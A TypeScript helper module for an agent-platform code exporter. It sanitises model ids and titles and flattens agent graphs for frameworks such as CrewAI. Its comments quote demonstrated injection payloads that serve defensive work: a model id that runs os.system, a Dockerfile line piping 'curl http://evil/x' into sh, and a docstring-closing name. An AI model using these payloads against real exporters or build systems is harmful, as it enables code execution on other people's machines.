/**
 * Shared helpers for AgentSwarms code exporters (LangGraph / CrewAI / OpenAI
 * Agents SDK / Strands). Keeps model-id handling, tool descriptions, the
 * gateway-model warning, and agent-graph flattening identical across every
 * generated target so they can't drift apart.
 *
 * Generated by AgentSwarm — https://agentswarms.fyi
 */
import type { PortableSwarmEdge, PortableSwarmNode } from "./swarmPortable";

/** Human-readable descriptions for the built-in swarm tool ids. */
export const TOOL_DESCRIPTIONS: Record<string, string> = {
  kb_search: "Search the attached knowledge base via vector similarity.",
  kb_graph_search: "Graph-aware search over the knowledge base (GraphRAG).",
  web_search: "Search the public web and return result snippets.",
  web_browse: "Fetch and read the contents of a web page.",
  n8n_run_workflow: "Trigger an n8n workflow and return its output.",
  mcp_call_tool: "Call a tool exposed by a connected MCP server.",
  calculator: "Evaluate an arithmetic expression and return the result.",
  datetime: "Return the current date and time.",
  weather: "Look up the current weather for a location.",
  sql_query: "Run a read-only SQL query over connected data tables.",
};

export function toolDescription(id: string): string {
  return TOOL_DESCRIPTIONS[id] || `${id} — implement your logic here.`;
}

/**
 * Strip *all* gateway/provider prefixes from a model id.
 *
 * AgentSwarms routes through a gateway, so models are stored as
 * `google/gemini-2.5-pro` or even `openrouter/openai/gpt-4o-mini`.
 * Native provider SDKs (OpenAI / Anthropic / Google) want the bare id, so we
 * take the final `/`-segment. This also yields the right value for OpenRouter
 * ids like `anthropic/claude-3.5-sonnet` → `claude-3.5-sonnet`.
 */
export function cleanModelId(model?: string): string {
  const m = (model || "gpt-4o").trim();
  const parts = m.split("/").filter(Boolean);
  return safeIdentifier(parts.length ? parts[parts.length - 1] : m, "gpt-4o");
}

/**
 * Reduce a value to characters that cannot break out of a generated literal.
 *
 * EVERY EXPORT INTERPOLATES THESE INTO SOURCE CODE the user is expected to run,
 * and the values are agent-controlled — an agent can arrive by import, by a
 * share link, or from a colleague's `agent.json`. Nothing escaped them.
 * Demonstrated, both working:
 *
 *   llm_model = 'gpt-4o", "x": __import__("os").system("id"), "y": "'
 *     -> AutoGen export emitted a VALID extra dict entry that runs on import.
 *
 *   llm_model = 'gpt-4o"\nRUN curl http://evil/x | sh\nENV Z="'
 *     -> the Dockerfile gained a real RUN instruction, executed at build time.
 *
 * So: share an agent, the recipient exports it and runs the file, your code
 * runs on their machine. That is the export feature working exactly as
 * intended, which is what makes it worth closing at the source.
 *
 * Escaping at each of the ~48 interpolation sites would be a per-language
 * problem solved forty-eight times. Model ids, providers and tool names all
 * have a narrow legitimate charset, so they are constrained here instead —
 * once, for every generator including the swarm exports.
 */
export function safeIdentifier(raw: string | undefined, fallback: string): string {
  // `/` IS PERMITTED. Gateway ids are `google/gemini-3-flash-preview` and the
  // manifest carries the full name — cleanModelId strips the prefix later, per
  // generator. A first version of this excluded it and turned every real model
  // id into `openaigpt-4o`, which my own probe caught: a sanitiser that
  // mangles all legitimate input is not a safer sanitiser, it is a broken
  // feature. A slash cannot terminate a quoted literal in Python, TypeScript,
  // a Dockerfile or YAML, so it costs nothing to allow.
  const cleaned = (raw ?? "").replace(/[^A-Za-z0-9._:/-]/g, "");
  return cleaned.slice(0, 120) || fallback;
}

/**
 * Make a human-readable string safe to drop into a generated comment or
 * docstring.
 *
 * FOUND BY A TEST WRITTEN FOR SOMETHING ELSE. The agent name is sanitised where
 * it becomes a Python identifier, and interpolated RAW into the module docstring
 * two lines above it. A name of
 *
 *     x"""\nimport os; os.system("id")\n"""
 *
 * produced a file whose first line closed the docstring and whose second line
 * was executable Python, run on import of the generated module. The same shape
 * closes a JavaScript block comment (star-slash) and injects a Dockerfile
 * instruction with a bare newline.
 *
 * Unlike safeIdentifier this keeps punctuation and spacing — a name is meant to
 * stay readable in the header — and removes only what can END the construct it
 * sits inside.
 */
export function safeTitle(raw: string | undefined, fallback = "Agent"): string {
  const cleaned = (raw ?? "")
    // Every line terminator JS recognises, including U+2028/U+2029.
    .replace(/[\r\n\u2028\u2029]+/g, " ")
    .replace(/"""|'''/g, "”””") // cannot close a Python docstring
    .replace(/\*\//g, "*∕") // cannot close a JS block comment
    .replace(/`/g, "'") // cannot close a TS template literal
    .trim()
    .slice(0, 120);
  return cleaned || fallback;
}

/**
 * Loud warning emitted into every generated file's header. Gateway model names
 * are not guaranteed to match a provider's public model ids, and the keys the
 * platform used are never exported, so the user must wire their own.
 */
export const MODEL_ID_WARNING =
  'Model IDs below are AgentSwarms AI Gateway names (e.g. "google/gemini-3-flash-preview"). ' +
  "They may NOT match your provider's public model names — replace each with a real model " +
  "id and set the matching API key (OPENAI_API_KEY / ANTHROPIC_API_KEY / GOOGLE_API_KEY).";

/**
 * Tools, knowledge bases (RAG), guardrails and memory configured on the canvas
 * are surfaced as stubs/notes only — the exporter cannot reproduce the hosted
 * runtime wiring. Spelled out once here so every target says the same thing.
 */
export const FIDELITY_NOTE = [
  "Fidelity note — this scaffold is a runnable STARTER, not a 1:1 copy of the hosted run:",
  "  • Tool bodies are stubs (the platform's hosted tools are not portable).",
  "  • Knowledge-base / RAG retrieval is NOT wired — attach your own retriever.",
  "  • Guardrails and memory settings are not reproduced here.",
  "  • Condition routing and loop bodies are TODO stubs where present.",
];

// ─────────────────────────────────────────────────────────────────────────────
// Agent-graph flattening
//
// LangGraph can represent every node kind, so it exports the graph verbatim.
// The agent-centric frameworks (CrewAI, OpenAI Agents SDK, Strands) only have a
// concept of "agent", so a path like
//
//     Researcher ──▶ [condition] ──▶ Writer
//
// used to lose BOTH edges, because neither endpoint pair was agent→agent. The
// result was a silently wrong graph: Writer became an unreachable orphan (or,
// in Strands, a second entry point, turning a sequential pipeline into two
// parallel roots) with only a generic "some nodes didn't map" comment as
// warning.
//
// bridgeAgentEdges() fixes that by walking THROUGH the unsupported nodes and
// reconnecting the agents on either side, recording which nodes were skipped so
// the generated code can name the elided logic at the exact point it was lost.
// ─────────────────────────────────────────────────────────────────────────────

/** An agent→agent connection, plus any non-agent nodes collapsed along the way. */
export type BridgedEdge = {
  source: string;
  target: string;
  /** Labels of the control-flow nodes traversed, in path order. Empty = direct edge. */
  via: string[];
  /** Branch label from the originating edge (e.g. a condition's "yes"), if any. */
  label?: string;
  /** How many distinct paths in the original graph collapsed into this edge. */
  paths: number;
};

/**
 * Reduce a full swarm graph to agent→agent edges, tunnelling through every
 * node kind the target framework can't express.
 *
 * Walks forward from each agent; on hitting a non-agent node it keeps going
 * until it reaches an agent (or runs out of graph), accumulating the skipped
 * labels. Visited-set per walk makes cycles terminate.
 */
export function bridgeAgentEdges(
  nodes: PortableSwarmNode[],
  edges: PortableSwarmEdge[],
): BridgedEdge[] {
  const agentIds = new Set(nodes.filter((n) => n.kind === "agent").map((n) => n.id));
  const labelOf = new Map(nodes.map((n) => [n.id, n.label || n.id]));
  const outgoing = new Map<string, PortableSwarmEdge[]>();
  for (const e of edges) {
    const list = outgoing.get(e.source);
    if (list) list.push(e);
    else outgoing.set(e.source, [e]);
  }

  // One entry per (source, target). Several distinct paths can connect the same
  // pair (e.g. a condition's "yes" and "no" branches both rejoining at the same
  // agent); emitting one edge each would produce duplicate add_edge/handoff
  // lines. Keep the shortest trail — it's the clearest explanation — and record
  // how many paths collapsed into it.
  const byPair = new Map<string, BridgedEdge>();

  for (const agent of nodes) {
    if (agent.kind !== "agent") continue;
    // Depth-first walk from this agent, carrying the skipped-node trail.
    const stack: { id: string; via: string[]; label?: string; visited: Set<string> }[] = (
      outgoing.get(agent.id) ?? []
    ).map((e) => ({
      id: e.target,
      via: [],
      label: e.label,
      visited: new Set([agent.id]),
    }));

    while (stack.length) {
      const cur = stack.pop()!;
      if (cur.visited.has(cur.id)) continue; // cycle guard
      const visited = new Set(cur.visited).add(cur.id);

      if (agentIds.has(cur.id)) {
        const key = `${agent.id}>${cur.id}`;
        const existing = byPair.get(key);
        if (!existing) {
          byPair.set(key, {
            source: agent.id,
            target: cur.id,
            via: cur.via,
            label: cur.label,
            paths: 1,
          });
        } else {
          existing.paths += 1;
          if (cur.via.length < existing.via.length) {
            existing.via = cur.via;
            existing.label = cur.label;
          }
        }
        continue; // stop at the first agent on this path
      }

      // Not an agent — collapse it and keep walking.
      const via = [...cur.via, labelOf.get(cur.id) ?? cur.id];
      for (const e of outgoing.get(cur.id) ?? []) {
        stack.push({ id: e.target, via, label: cur.label ?? e.label, visited });
      }
    }
  }
  return [...byPair.values()];
}

/** Agents with no inbound bridged edge — the real entry points after flattening. */
export function bridgedEntryAgents(
  nodes: PortableSwarmNode[],
  bridged: BridgedEdge[],
): PortableSwarmNode[] {
  const hasInbound = new Set(bridged.map((b) => b.target));
  const agents = nodes.filter((n) => n.kind === "agent");
  const roots = agents.filter((a) => !hasInbound.has(a.id));
  // A fully cyclic agent graph has no root; fall back to the first agent so the
  // generated file still runs.
  return roots.length ? roots : agents.slice(0, 1);
}

/** One-line "…(via X → Y)" suffix naming the logic collapsed into a bridged edge. */
export function viaSuffix(via: string[], paths = 1): string {
  if (!via.length) return "";
  const more = paths > 1 ? `, +${paths - 1} other path${paths > 2 ? "s" : ""}` : "";
  return ` (via ${via.join(" → ")}${more} — logic NOT reproduced)`;
}
